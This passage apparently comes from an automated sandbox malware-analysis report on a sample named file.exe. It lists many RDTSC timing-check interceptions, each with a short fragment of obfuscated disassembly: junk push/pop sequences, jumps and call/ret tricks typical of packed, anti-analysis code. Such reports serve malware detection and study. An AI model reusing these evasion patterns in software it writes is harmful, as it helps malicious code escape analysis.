[ebp+122D1CA3h], edx 0x0000005d xchg eax, ebx 0x0000005e jmp 00007EFD80CDE8D8h 0x00000063 push eax 0x00000064 push eax 0x00000065 push edx 0x00000066 push eax 0x00000067 push edx 0x00000068 push eax 0x00000069 pop eax 0x0000006a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1377E60 second address: 1377E66 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1379247 second address: 137924C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137924C second address: 1379252 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1379252 second address: 1379256 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1379A10 second address: 1379A14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137CA88 second address: 137CA90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137DB7D second address: 137DB82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137E9E9 second address: 137E9ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137DB82 second address: 137DB8C instructions: 0x00000000 rdtsc 0x00000002 jc 00007EFD80CCF02Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137E9ED second address: 137E9F3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137FA51 second address: 137FA6F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD80CCF035h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138099A second address: 13809CD instructions: 0x00000000 rdtsc 0x00000002 jg 00007EFD80CDE8CCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b js 00007EFD80CDE8E7h 0x00000011 pushad 0x00000012 jmp 00007EFD80CDE8D9h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137FC10 second address: 137FC16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137FC16 second address: 137FC24 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13809CD second address: 13809FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 mov edi, dword ptr [ebp+122D2C12h] 0x0000000c push 00000000h 0x0000000e mov dword ptr [ebp+12470F59h], esi 0x00000014 push 00000000h 0x00000016 xor dword ptr [ebp+122D38F5h], ebx 0x0000001c xchg eax, esi 0x0000001d jmp 00007EFD80CCF02Ch 0x00000022 push eax 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 popad 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13809FC second address: 1380A00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1380A00 second address: 1380A09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1381ADE second address: 1381AEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jbe 00007EFD80CDE8C6h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1381AEE second address: 1381B06 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD80CCF034h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1381B06 second address: 1381B0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1381B0C second address: 1381B10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1380B6B second address: 1380B71 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1380B71 second address: 1380B77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1380B77 second address: 1380B7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1380B7B second address: 1380B7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1382CBF second address: 1382CD3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD80CDE8D0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1383C2E second address: 1383CBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007EFD80CCF034h 0x0000000c popad 0x0000000d popad 0x0000000e mov dword ptr [esp], eax 0x00000011 sub dword ptr [ebp+122D1C82h], edx 0x00000017 mov di, bx 0x0000001a push 00000000h 0x0000001c jmp 00007EFD80CCF038h 0x00000021 push 00000000h 0x00000023 push 00000000h 0x00000025 push ecx 0x00000026 call 00007EFD80CCF028h 0x0000002b pop ecx 0x0000002c mov dword ptr [esp+04h], ecx 0x00000030 add dword ptr [esp+04h], 00000016h 0x00000038 inc ecx 0x00000039 push ecx 0x0000003a ret 0x0000003b pop ecx 0x0000003c ret 0x0000003d mov dword ptr [ebp+122D39F3h], ecx 0x00000043 xor edi, dword ptr [ebp+122D2C1Ah] 0x00000049 push eax 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d jmp 00007EFD80CCF02Dh 0x00000052 jmp 00007EFD80CCF030h 0x00000057 popad 0x00000058 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1383CBF second address: 1383CCF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFD80CDE8CCh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1384BE9 second address: 1384C79 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD80CCF02Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d jnp 00007EFD80CCF026h 0x00000013 pop edi 0x00000014 pop edx 0x00000015 nop 0x00000016 push 00000000h 0x00000018 push ebp 0x00000019 call 00007EFD80CCF028h 0x0000001e pop ebp 0x0000001f mov dword ptr [esp+04h], ebp 0x00000023 add dword ptr [esp+04h], 0000001Ch 0x0000002b inc ebp 0x0000002c push ebp 0x0000002d ret 0x0000002e pop ebp 0x0000002f ret 0x00000030 and edi, dword ptr [ebp+122D25AFh] 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push ecx 0x0000003b call 00007EFD80CCF028h 0x00000040 pop ecx 0x00000041 mov dword ptr [esp+04h], ecx 0x00000045 add dword ptr [esp+04h], 00000015h 0x0000004d inc ecx 0x0000004e push ecx 0x0000004f ret 0x00000050 pop ecx 0x00000051 ret 0x00000052 xor bl, FFFFFF97h 0x00000055 push 00000000h 0x00000057 jl 00007EFD80CCF034h 0x0000005d pushad 0x0000005e mov edi, dword ptr [ebp+122D29EAh] 0x00000064 or dword ptr [ebp+12454A5Ah], esi 0x0000006a popad 0x0000006b push eax 0x0000006c push eax 0x0000006d push edx 0x0000006e push eax 0x0000006f push edx 0x00000070 jmp 00007EFD80CCF02Bh 0x00000075 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1384C79 second address: 1384C7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1384C7D second address: 1384C83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1384C83 second address: 1384C8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007EFD80CDE8C6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1385BEA second address: 1385C59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jp 00007EFD80CCF02Ch 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f mov bx, F572h 0x00000013 push 00000000h 0x00000015 add dword ptr [ebp+122D31A1h], ecx 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f push edx 0x00000020 call 00007EFD80CCF028h 0x00000025 pop edx 0x00000026 mov dword ptr [esp+04h], edx 0x0000002a add dword ptr [esp+04h], 00000017h 0x00000032 inc edx 0x00000033 push edx 0x00000034 ret 0x00000035 pop edx 0x00000036 ret 0x00000037 push eax 0x00000038 mov di, 7F17h 0x0000003c pop ebx 0x0000003d xchg eax, esi 0x0000003e jnl 00007EFD80CCF041h 0x00000044 push eax 0x00000045 pushad 0x00000046 push esi 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1385C59 second address: 1385C66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jg 00007EFD80CDE8C6h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1385C66 second address: 1385C6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1386E89 second address: 1386EB2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop edx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f mov dword ptr [ebp+122D2D08h], esi 0x00000015 push 00000000h 0x00000017 push esi 0x00000018 mov edi, dword ptr [ebp+122D294Ah] 0x0000001e pop edi 0x0000001f push eax 0x00000020 jc 00007EFD80CDE8CEh 0x00000026 push ecx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1387DC1 second address: 1387DD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFD80CCF02Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1387DD1 second address: 1387DDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1387FA7 second address: 1387FBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFD80CCF032h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1384EB7 second address: 1384EBC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138C426 second address: 138C42B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138C42B second address: 138C431 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138C431 second address: 138C435 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138B6FC second address: 138B703 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138D4B0 second address: 138D4C2 instructions: 0x00000000 rdtsc 0x00000002 jo 00007EFD80CCF026h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138D4C2 second address: 138D4DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD80CDE8D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13964CF second address: 13964E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007EFD80CCF02Fh 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13964E5 second address: 13964F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007EFD80CDE8C6h 0x00000009 jg 00007EFD80CDE8C6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1395DD1 second address: 1395DE3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD80CCF02Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1395DE3 second address: 1395DFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007EFD80CDE8D3h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1396102 second address: 1396120 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007EFD80CCF035h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1396120 second address: 139612E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007EFD80CDE8D2h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139612E second address: 1396134 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1398C3F second address: 1398C4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1398C4A second address: 1398C4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1398C4E second address: 1398C54 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1398C54 second address: 1398C70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 pushad 0x00000008 push edi 0x00000009 jmp 00007EFD80CCF02Ch 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 pop edi 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1398C70 second address: 1398C74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1398C74 second address: 1398C96 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD80CCF037h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push edx 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139C931 second address: 139C935 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139CA8E second address: 139CA98 instructions: 0x00000000 rdtsc 0x00000002 jg 00007EFD80CCF026h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139CA98 second address: 11C1D57 instructions: 0x00000000 rdtsc 0x00000002 jc 00007EFD80CDE8CCh 0x00000008 jbe 00007EFD80CDE8C6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop eax 0x00000011 cld 0x00000012 push dword ptr [ebp+122D02F5h] 0x00000018 ja 00007EFD80CDE8D2h 0x0000001e call dword ptr [ebp+122D21C2h] 0x00000024 pushad 0x00000025 pushad 0x00000026 call 00007EFD80CDE8D9h 0x0000002b push ecx 0x0000002c pop eax 0x0000002d pop ebx 0x0000002e jmp 00007EFD80CDE8D0h 0x00000033 popad 0x00000034 xor eax, eax 0x00000036 mov dword ptr [ebp+122D2D08h], edx 0x0000003c mov edx, dword ptr [esp+28h] 0x00000040 jmp 00007EFD80CDE8D6h 0x00000045 mov dword ptr [ebp+122D2B3Eh], eax 0x0000004b jmp 00007EFD80CDE8D3h 0x00000050 mov esi, 0000003Ch 0x00000055 add dword ptr [ebp+122D2D08h], eax 0x0000005b add esi, dword ptr [esp+24h] 0x0000005f sub dword ptr [ebp+122D2CECh], ebx 0x00000065 lodsw 0x00000067 or dword ptr [ebp+122D3035h], edx 0x0000006d add eax, dword ptr [esp+24h] 0x00000071 sub dword ptr [ebp+122D24D1h], ecx 0x00000077 mov ebx, dword ptr [esp+24h] 0x0000007b stc 0x0000007c nop 0x0000007d push ebx 0x0000007e push eax 0x0000007f push edx 0x00000080 jp 00007EFD80CDE8C6h 0x00000086 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139F931 second address: 139F956 instructions: 0x00000000 rdtsc 0x00000002 jne 00007EFD80CCF02Eh 0x00000008 push edi 0x00000009 pushad 0x0000000a popad 0x0000000b jo 00007EFD80CCF026h 0x00000011 pop edi 0x00000012 pop edx 0x00000013 pop eax 0x00000014 js 00007EFD80CCF051h 0x0000001a push esi 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A4A16 second address: 13A4A1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A4A1F second address: 13A4A23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A4A23 second address: 13A4A27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A3D1A second address: 13A3D28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jl 00007EFD80CCF026h 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A3E6F second address: 13A3E73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A3E73 second address: 13A3E87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007EFD80CCF026h 0x0000000e jnl 00007EFD80CCF026h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A3E87 second address: 13A3E8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A4007 second address: 13A400B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A400B second address: 13A4029 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jng 00007EFD80CDE8C6h 0x00000011 jbe 00007EFD80CDE8C6h 0x00000017 jp 00007EFD80CDE8C6h 0x0000001d popad 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A4029 second address: 13A4040 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jp 00007EFD80CCF026h 0x0000000b jno 00007EFD80CCF026h 0x00000011 popad 0x00000012 push edi 0x00000013 push eax 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A45B6 second address: 13A45CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD80CDE8D0h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A4754 second address: 13A475A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A475A second address: 13A4764 instructions: 0x00000000 rdtsc 0x00000002 jl 00007EFD80CDE8C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A4764 second address: 13A479F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007EFD80CCF02Fh 0x0000000b jmp 00007EFD80CCF034h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007EFD80CCF02Eh 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A6045 second address: 13A6055 instructions: 0x00000000 rdtsc 0x00000002 js 00007EFD80CDE8C6h 0x00000008 jns 00007EFD80CDE8C6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A6055 second address: 13A605A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A8C97 second address: 13A8CC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFD80CDE8D6h 0x00000009 pop ebx 0x0000000a js 00007EFD80CDE8CCh 0x00000010 je 00007EFD80CDE8C6h 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AD0F1 second address: 13AD0F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop esi 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AD0F8 second address: 13AD109 instructions: 0x00000000 rdtsc 0x00000002 jno 00007EFD80CDE8C8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AD109 second address: 13AD112 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push esi 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 pop esi 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AD112 second address: 13AD131 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD80CDE8D4h 0x00000007 pushad 0x00000008 js 00007EFD80CDE8C6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13ADE78 second address: 13ADE7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13ADE7C second address: 13ADE82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13ADE82 second address: 13ADE87 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13ADFCD second address: 13ADFD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
